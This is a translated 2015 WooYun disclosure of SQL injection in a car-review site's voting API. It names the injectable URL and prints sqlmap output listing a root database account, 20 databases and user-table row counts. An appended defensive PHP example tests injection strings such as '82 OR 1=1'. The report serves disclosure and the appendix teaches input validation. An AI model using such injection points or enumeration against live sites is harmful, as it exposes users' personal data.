
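Vulnerability summary

Bug ID: wooyun-2015-0132088

Vulnerability title: SQL injection on an important 汽车点评 (car review) site affects 1.8 million users

Vendor: xgo.com.cn

Author: 孤风

Submitted: 2015-08-06 13:15

Fixed: 2015-09-20 16:04

Publicly disclosed: 2015-09-20 16:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]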



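Vulnerability details

Disclosure status:

2015-08-06: Details sent to the vendor; waiting for the vendor to respond
2015-08-06: Vendor confirmed; details visible to the vendor only
2015-08-16: Details disclosed to core white hats and experts in the relevant field
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to trainee white hats
2015-09-20: Details disclosed to the public

Brief description:

A very important site; the consequences would be serious if it were compromised.

Detailed description:

Site

api.xgo.com.cn


Many of the vendor's sites pull their data from this one, so if it is compromised, well, heh.
Injection point

http://api.xgo.com.cn/vote_arrnew.php?voteid=82


root user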

[12:52:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[12:52:43] [INFO] fetching database users
[12:52:43] [WARNING] reflective value(s) found and filtering out
[12:52:43] [INFO] the SQL query used returns 1 entries
[12:52:43] [INFO] retrieved: 'root'@'192.168.50.40'
database management system users [1]:
[*] 'root'@'192.168.50.40'


Databases

available databases [20]:
[*] information_schema
[*] test
[*] xgo_active
[*] xgo_bbs
[*] xgo_bbs_admin
[*] xgo_bbs_troop
[*] xgo_comment
[*] xgo_picture
[*] xgo_plugin
[*] xgo_product
[*] xgo_product_stat
[*] xgo_review
[*] xgo_stat_hits
[*] xgo_tips
[*] xgo_tips_admin
[*] xgo_topic
[*] xgo_tuan
[*] xgo_user
[*] xgo_yongpin
[*] xgo_zhuqu


1.8 million users

Database: xgo_user
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| user_relations | 6387754 |
| userinfo | 1869916 |
| user_active_log | 1677306 |
| user_checkimg | 1476298 |
| user_album_pic | 911875 |
| user_check_mobile_code | 878586 |
| user_online | 484162 |
| user_real | 471549 |
| user_extend | 471537 |
| user_mail_set | 471455 |
| user_message_2011 | 413961 |
| user_message_2014 | 394551 |
| user_register_log | 323516 |
| user_message_2013 | 255437 |
| user_message | 244635 |
| user_album_info | 231716 |
| user_score | 226902 |
| user_check_mail_code | 221728 |
| user_oltime_2015 | 190457 |
| user_message_2012 | 156266 |
| user_oltime_2011 | 125514 |
| user_oltime_2013 | 125226 |
| userinfo_test | 123526 |
| userinfo_new | 111228 |
| user_visitor | 107855 |
| user_oltime_2012 | 93920 |
| user_oltime_2014 | 88678 |
| x_invite_code | 39950 |
| z_login_api | 37313 |
| z_api_token | 16951 |
| tag_from_pic | 6339 |
| tag_from_user | 6339 |
| user_car_list_product_rel | 5094 |
| x_user_score | 5021 |
| x_userinfo_extend | 5021 |
| x_log_login_2013 | 4974 |
| audit_log | 4824 |
| x_check_mail_code | 4688 |
| user_comments | 3538 |
| x_log_send_mail_2013 | 3012 |
| user_tag2 | 2890 |
| x_register_history | 2632 |
| user_album_pic_tags | 2571 |
| user_carport | 2502 |
| china_city | 2489 |
| x_check_mobile_code | 1926 |
| x_user_car | 1397 |
| x_log_login_2015 | 1245 |
| user_interest_doc0 | 1232 |
| user_book_collection | 1178 |
| x_log_login_2014 | 1101 |
| x_log_send_mail_2014 | 1080 |
| whitelistuser | 1043 |
| x_log_modify_pwd_2013 | 989 |
| user_obj_comments | 974 |
| tag | 938 |
| user_car_list | 924 |
| user_tag_num | 812 |
| x_register | 758 |
| x_log_send_mail_2015 | 689 |
| checkimg_group | 585 |
| china_town | 580 |
| gift_present | 425 |
| tag_user9 | 405 |
| tag_user1 | 388 |
| tag_user8 | 361 |
| x_oauth_bind | 348 |
| user_owner_info | 346 |
| tag_user7 | 339 |
| tag_user3 | 320 |
| user_hide | 312 |
| x_log_modify_pwd_2014 | 292 |
| tag_user5 | 287 |
| tag_user6 | 279 |
| z_login_api_bark | 279 |
| tag_user4 | 244 |
| gift_buy | 235 |
| tag_user2 | 232 |
| x_log_modify_pwd_2015 | 156 |
| user_interest_doc17 | 152 |
| user_car_list_vote_1 | 87 |
| tag_user10 | 70 |
| user_interest_doc18 | 39 |
| china_province | 35 |
| user_tag1 | 35 |
| gift | 32 |
| user_active_cate | 30 |
| user_rank | 9 |
| gift_sort | 6 |
| user_modify_pw_log | 5 |
| x_user_verify | 2 |
| xgo_qq_session | 2 |
+---------------------------+---------+

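Proof of vulnerability:

See above. A rank of 20 isn't too much to ask, is it?

Suggested fix:

Filter the input.

Copyright notice: please credit the source when reposting: 孤风@乌云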
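
Added example (not part of the original report and not the vendor's code): one way to handle the `voteid` parameter named in the report so that it cannot alter the query, combining strict integer validation with a bound parameter. The `vote` table, its columns and the `demoDb`/`fetchVote` helpers are hypothetical, and in-memory SQLite stands in for the site's MySQL so the script runs offline.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the vote data (hypothetical schema and rows).
// In-memory SQLite keeps the demo offline; the reported back end is MySQL 5.
// With a mysql: DSN, also set PDO::ATTR_EMULATE_PREPARES to false.
function demoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE vote (voteid INTEGER PRIMARY KEY, title TEXT)');
    $db->exec("INSERT INTO vote VALUES (82, 'constructed poll A'), (83, 'constructed poll B')");
    return $db;
}

// Hardened lookup: reject anything that is not a positive integer,
// then bind the value so it is never parsed as SQL text.
function fetchVote(PDO $db, $rawVoteId): ?array
{
    $voteId = filter_var($rawVoteId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($voteId === false) {
        return null; // a real handler would answer HTTP 400 here
    }
    $stmt = $db->prepare('SELECT voteid, title FROM vote WHERE voteid = :id');
    $stmt->bindValue(':id', $voteId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: one valid id, several malformed values, one unknown id.
$db = demoDb();
foreach (['82', '82 OR 1=1', "82'", '', '-1', '999'] as $input) {
    $row = fetchVote($db, $input);
    printf("%-14s => %s\n", var_export($input, true), $row ? $row['title'] : 'rejected / not found');
}
```

The sqlmap output above shows the connection running as root with 20 databases visible; a dedicated MySQL account granted only the tables this endpoint reads would limit what a single injectable parameter can reach.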


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-08-06 16:03

Vendor reply:

Already fixed.

Latest status:

None

